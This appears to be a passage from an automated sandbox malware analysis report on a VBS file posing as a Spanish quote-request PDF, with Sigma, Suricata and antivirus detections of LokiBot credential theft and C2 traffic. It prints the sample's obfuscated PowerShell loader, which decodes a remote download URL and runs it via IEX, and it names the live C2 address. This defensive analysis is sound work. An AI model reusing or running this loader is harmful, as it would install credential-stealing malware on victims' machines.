                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs", ProcessId: 6356, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: u, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs", ProcessId: 6356, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,ors

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:44:45.355745+020020243121A Network Trojan was detected192.168.2.749709137.184.191.21580TCP
                2024-10-01T07:44:48.265499+020020243121A Network Trojan was detected192.168.2.749710137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:44:42.734823+020020253811Malware Command and Control Activity Detected192.168.2.749709137.184.191.21580TCP
                2024-10-01T07:44:45.430241+020020253811Malware Command and Control Activity Detected192.168.2.749710137.184.191.21580TCP
                2024-10-01T07:44:48.499597+020020253811Malware Command and Control Activity Detected192.168.2.749711137.184.191.21580TCP
                2024-10-01T07:44:51.247041+020020253811Malware Command and Control Activity Detected192.168.2.749715137.184.191.21580TCP
                2024-10-01T07:44:53.977271+020020253811Malware Command and Control Activity Detected192.168.2.749716137.184.191.21580TCP
                2024-10-01T07:44:56.833376+020020253811Malware Command and Control Activity Detected192.168.2.749717137.184.191.21580TCP
                2024-10-01T07:44:59.762869+020020253811Malware Command and Control Activity Detected192.168.2.749718137.184.191.21580TCP
                2024-10-01T07:45:02.498334+020020253811Malware Command and Control Activity Detected192.168.2.749719137.184.191.21580TCP
                2024-10-01T07:45:05.218401+020020253811Malware Command and Control Activity Detected192.168.2.749720137.184.191.21580TCP
                2024-10-01T07:45:08.004705+020020253811Malware Command and Control Activity Detected192.168.2.749721137.184.191.21580TCP
                2024-10-01T07:45:10.938340+020020253811Malware Command and Control Activity Detected192.168.2.749722137.184.191.21580TCP
                2024-10-01T07:45:13.695208+020020253811Malware Command and Control Activity Detected192.168.2.749723137.184.191.21580TCP
                2024-10-01T07:45:16.444408+020020253811Malware Command and Control Activity Detected192.168.2.749724137.184.191.21580TCP
                2024-10-01T07:45:19.193169+020020253811Malware Command and Control Activity Detected192.168.2.749725137.184.191.21580TCP
                2024-10-01T07:45:21.906100+020020253811Malware Command and Control Activity Detected192.168.2.749726137.184.191.21580TCP
                2024-10-01T07:45:24.642575+020020253811Malware Command and Control Activity Detected192.168.2.749727137.184.191.21580TCP
                2024-10-01T07:45:27.919113+020020253811Malware Command and Control Activity Detected192.168.2.749728137.184.191.21580TCP
                2024-10-01T07:45:30.964238+020020253811Malware Command and Control Activity Detected192.168.2.749729137.184.191.21580TCP
                2024-10-01T07:45:33.769111+020020253811Malware Command and Control Activity Detected192.168.2.749730137.184.191.21580TCP
                2024-10-01T07:45:36.660144+020020253811Malware Command and Control Activity Detected192.168.2.749731137.184.191.21580TCP
                2024-10-01T07:45:39.377390+020020253811Malware Command and Control Activity Detected192.168.2.749732137.184.191.21580TCP
                2024-10-01T07:45:42.498444+020020253811Malware Command and Control Activity Detected192.168.2.749733137.184.191.21580TCP
                2024-10-01T07:45:45.298134+020020253811Malware Command and Control Activity Detected192.168.2.749734137.184.191.21580TCP
                2024-10-01T07:45:48.385314+020020253811Malware Command and Control Activity Detected192.168.2.749735137.184.191.21580TCP
                2024-10-01T07:45:51.251136+020020253811Malware Command and Control Activity Detected192.168.2.749736137.184.191.21580TCP
                2024-10-01T07:45:54.100526+020020253811Malware Command and Control Activity Detected192.168.2.749737137.184.191.21580TCP
                2024-10-01T07:45:56.873550+020020253811Malware Command and Control Activity Detected192.168.2.749738137.184.191.21580TCP
                2024-10-01T07:45:59.605783+020020253811Malware Command and Control Activity Detected192.168.2.749739137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:44:51.084955+020020243131Malware Command and Control Activity Detected192.168.2.749711137.184.191.21580TCP
                2024-10-01T07:44:53.797155+020020243131Malware Command and Control Activity Detected192.168.2.749715137.184.191.21580TCP
                2024-10-01T07:44:56.665130+020020243131Malware Command and Control Activity Detected192.168.2.749716137.184.191.21580TCP
                2024-10-01T07:44:59.412791+020020243131Malware Command and Control Activity Detected192.168.2.749717137.184.191.21580TCP
                2024-10-01T07:45:02.344775+020020243131Malware Command and Control Activity Detected192.168.2.749718137.184.191.21580TCP
                2024-10-01T07:45:05.063364+020020243131Malware Command and Control Activity Detected192.168.2.749719137.184.191.21580TCP
                2024-10-01T07:45:07.848185+020020243131Malware Command and Control Activity Detected192.168.2.749720137.184.191.21580TCP
                2024-10-01T07:45:10.771424+020020243131Malware Command and Control Activity Detected192.168.2.749721137.184.191.21580TCP
                2024-10-01T07:45:13.525771+020020243131Malware Command and Control Activity Detected192.168.2.749722137.184.191.21580TCP
                2024-10-01T07:45:16.261887+020020243131Malware Command and Control Activity Detected192.168.2.749723137.184.191.21580TCP
                2024-10-01T07:45:19.036407+020020243131Malware Command and Control Activity Detected192.168.2.749724137.184.191.21580TCP
                2024-10-01T07:45:21.752968+020020243131Malware Command and Control Activity Detected192.168.2.749725137.184.191.21580TCP
                2024-10-01T07:45:24.487671+020020243131Malware Command and Control Activity Detected192.168.2.749726137.184.191.21580TCP
                2024-10-01T07:45:27.381066+020020243131Malware Command and Control Activity Detected192.168.2.749727137.184.191.21580TCP
                2024-10-01T07:45:30.517560+020020243131Malware Command and Control Activity Detected192.168.2.749728137.184.191.21580TCP
                2024-10-01T07:45:33.616722+020020243131Malware Command and Control Activity Detected192.168.2.749729137.184.191.21580TCP
                2024-10-01T07:45:36.504965+020020243131Malware Command and Control Activity Detected192.168.2.749730137.184.191.21580TCP
                2024-10-01T07:45:39.222873+020020243131Malware Command and Control Activity Detected192.168.2.749731137.184.191.21580TCP
                2024-10-01T07:45:42.347762+020020243131Malware Command and Control Activity Detected192.168.2.749732137.184.191.21580TCP
                2024-10-01T07:45:45.146305+020020243131Malware Command and Control Activity Detected192.168.2.749733137.184.191.21580TCP
                2024-10-01T07:45:48.020419+020020243131Malware Command and Control Activity Detected192.168.2.749734137.184.191.21580TCP
                2024-10-01T07:45:50.982541+020020243131Malware Command and Control Activity Detected192.168.2.749735137.184.191.21580TCP
                2024-10-01T07:45:53.802372+020020243131Malware Command and Control Activity Detected192.168.2.749736137.184.191.21580TCP
                2024-10-01T07:45:56.726060+020020243131Malware Command and Control Activity Detected192.168.2.749737137.184.191.21580TCP
                2024-10-01T07:45:59.432377+020020243131Malware Command and Control Activity Detected192.168.2.749738137.184.191.21580TCP
                2024-10-01T07:46:02.166163+020020243131Malware Command and Control Activity Detected192.168.2.749739137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:44:51.084955+020020243181Malware Command and Control Activity Detected192.168.2.749711137.184.191.21580TCP
                2024-10-01T07:44:53.797155+020020243181Malware Command and Control Activity Detected192.168.2.749715137.184.191.21580TCP
                2024-10-01T07:44:56.665130+020020243181Malware Command and Control Activity Detected192.168.2.749716137.184.191.21580TCP
                2024-10-01T07:44:59.412791+020020243181Malware Command and Control Activity Detected192.168.2.749717137.184.191.21580TCP
                2024-10-01T07:45:02.344775+020020243181Malware Command and Control Activity Detected192.168.2.749718137.184.191.21580TCP
                2024-10-01T07:45:05.063364+020020243181Malware Command and Control Activity Detected192.168.2.749719137.184.191.21580TCP
                2024-10-01T07:45:07.848185+020020243181Malware Command and Control Activity Detected192.168.2.749720137.184.191.21580TCP
                2024-10-01T07:45:10.771424+020020243181Malware Command and Control Activity Detected192.168.2.749721137.184.191.21580TCP
                2024-10-01T07:45:13.525771+020020243181Malware Command and Control Activity Detected192.168.2.749722137.184.191.21580TCP
                2024-10-01T07:45:16.261887+020020243181Malware Command and Control Activity Detected192.168.2.749723137.184.191.21580TCP
                2024-10-01T07:45:19.036407+020020243181Malware Command and Control Activity Detected192.168.2.749724137.184.191.21580TCP
                2024-10-01T07:45:21.752968+020020243181Malware Command and Control Activity Detected192.168.2.749725137.184.191.21580TCP
                2024-10-01T07:45:24.487671+020020243181Malware Command and Control Activity Detected192.168.2.749726137.184.191.21580TCP
                2024-10-01T07:45:27.381066+020020243181Malware Command and Control Activity Detected192.168.2.749727137.184.191.21580TCP
                2024-10-01T07:45:30.517560+020020243181Malware Command and Control Activity Detected192.168.2.749728137.184.191.21580TCP
                2024-10-01T07:45:33.616722+020020243181Malware Command and Control Activity Detected192.168.2.749729137.184.191.21580TCP
                2024-10-01T07:45:36.504965+020020243181Malware Command and Control Activity Detected192.168.2.749730137.184.191.21580TCP
                2024-10-01T07:45:39.222873+020020243181Malware Command and Control Activity Detected192.168.2.749731137.184.191.21580TCP
                2024-10-01T07:45:42.347762+020020243181Malware Command and Control Activity Detected192.168.2.749732137.184.191.21580TCP
                2024-10-01T07:45:45.146305+020020243181Malware Command and Control Activity Detected192.168.2.749733137.184.191.21580TCP
                2024-10-01T07:45:48.020419+020020243181Malware Command and Control Activity Detected192.168.2.749734137.184.191.21580TCP
                2024-10-01T07:45:50.982541+020020243181Malware Command and Control Activity Detected192.168.2.749735137.184.191.21580TCP
                2024-10-01T07:45:53.802372+020020243181Malware Command and Control Activity Detected192.168.2.749736137.184.191.21580TCP
                2024-10-01T07:45:56.726060+020020243181Malware Command and Control Activity Detected192.168.2.749737137.184.191.21580TCP
                2024-10-01T07:45:59.432377+020020243181Malware Command and Control Activity Detected192.168.2.749738137.184.191.21580TCP
                2024-10-01T07:46:02.166163+020020243181Malware Command and Control Activity Detected192.168.2.749739137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:44:42.734823+020020216411A Network Trojan was detected192.168.2.749709137.184.191.21580TCP
                2024-10-01T07:44:45.430241+020020216411A Network Trojan was detected192.168.2.749710137.184.191.21580TCP
                2024-10-01T07:44:48.499597+020020216411A Network Trojan was detected192.168.2.749711137.184.191.21580TCP
                2024-10-01T07:44:51.247041+020020216411A Network Trojan was detected192.168.2.749715137.184.191.21580TCP
                2024-10-01T07:44:53.977271+020020216411A Network Trojan was detected192.168.2.749716137.184.191.21580TCP
                2024-10-01T07:44:56.833376+020020216411A Network Trojan was detected192.168.2.749717137.184.191.21580TCP
                2024-10-01T07:44:59.762869+020020216411A Network Trojan was detected192.168.2.749718137.184.191.21580TCP
                2024-10-01T07:45:02.498334+020020216411A Network Trojan was detected192.168.2.749719137.184.191.21580TCP
                2024-10-01T07:45:05.218401+020020216411A Network Trojan was detected192.168.2.749720137.184.191.21580TCP
                2024-10-01T07:45:08.004705+020020216411A Network Trojan was detected192.168.2.749721137.184.191.21580TCP
                2024-10-01T07:45:10.938340+020020216411A Network Trojan was detected192.168.2.749722137.184.191.21580TCP
                2024-10-01T07:45:13.695208+020020216411A Network Trojan was detected192.168.2.749723137.184.191.21580TCP
                2024-10-01T07:45:16.444408+020020216411A Network Trojan was detected192.168.2.749724137.184.191.21580TCP
                2024-10-01T07:45:19.193169+020020216411A Network Trojan was detected192.168.2.749725137.184.191.21580TCP
                2024-10-01T07:45:21.906100+020020216411A Network Trojan was detected192.168.2.749726137.184.191.21580TCP
                2024-10-01T07:45:24.642575+020020216411A Network Trojan was detected192.168.2.749727137.184.191.21580TCP
                2024-10-01T07:45:27.919113+020020216411A Network Trojan was detected192.168.2.749728137.184.191.21580TCP
                2024-10-01T07:45:30.964238+020020216411A Network Trojan was detected192.168.2.749729137.184.191.21580TCP
                2024-10-01T07:45:33.769111+020020216411A Network Trojan was detected192.168.2.749730137.184.191.21580TCP
                2024-10-01T07:45:36.660144+020020216411A Network Trojan was detected192.168.2.749731137.184.191.21580TCP
                2024-10-01T07:45:39.377390+020020216411A Network Trojan was detected192.168.2.749732137.184.191.21580TCP
                2024-10-01T07:45:42.498444+020020216411A Network Trojan was detected192.168.2.749733137.184.191.21580TCP
                2024-10-01T07:45:45.298134+020020216411A Network Trojan was detected192.168.2.749734137.184.191.21580TCP
                2024-10-01T07:45:48.385314+020020216411A Network Trojan was detected192.168.2.749735137.184.191.21580TCP
                2024-10-01T07:45:51.251136+020020216411A Network Trojan was detected192.168.2.749736137.184.191.21580TCP
                2024-10-01T07:45:54.100526+020020216411A Network Trojan was detected192.168.2.749737137.184.191.21580TCP
                2024-10-01T07:45:56.873550+020020216411A Network Trojan was detected192.168.2.749738137.184.191.21580TCP
                2024-10-01T07:45:59.605783+020020216411A Network Trojan was detected192.168.2.749739137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:44:38.340304+020028032702Potentially Bad Traffic192.168.2.749707142.250.185.142443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for domain / URL
                Source: http://137.184.191.215/index.php/10899Virustotal: Detection: 10%Perma Link
                Multi AV Scanner detection for submitted file
                Source: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsVirustotal: Detection: 9%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49708 version: TLS 1.2
                Source: Binary string: qm.Core.pdb?8 source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdb source: powershell.exe, 0000000B.00000002.2355401615.00000000083C0000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49709 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49709 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49709 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49711 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49711 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49711 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49711 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49710 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49710 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.7:49710 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49726 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49722 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49720 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49715 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49727 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49723 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49731 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49730 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49732 -> 137.184.191.215:80
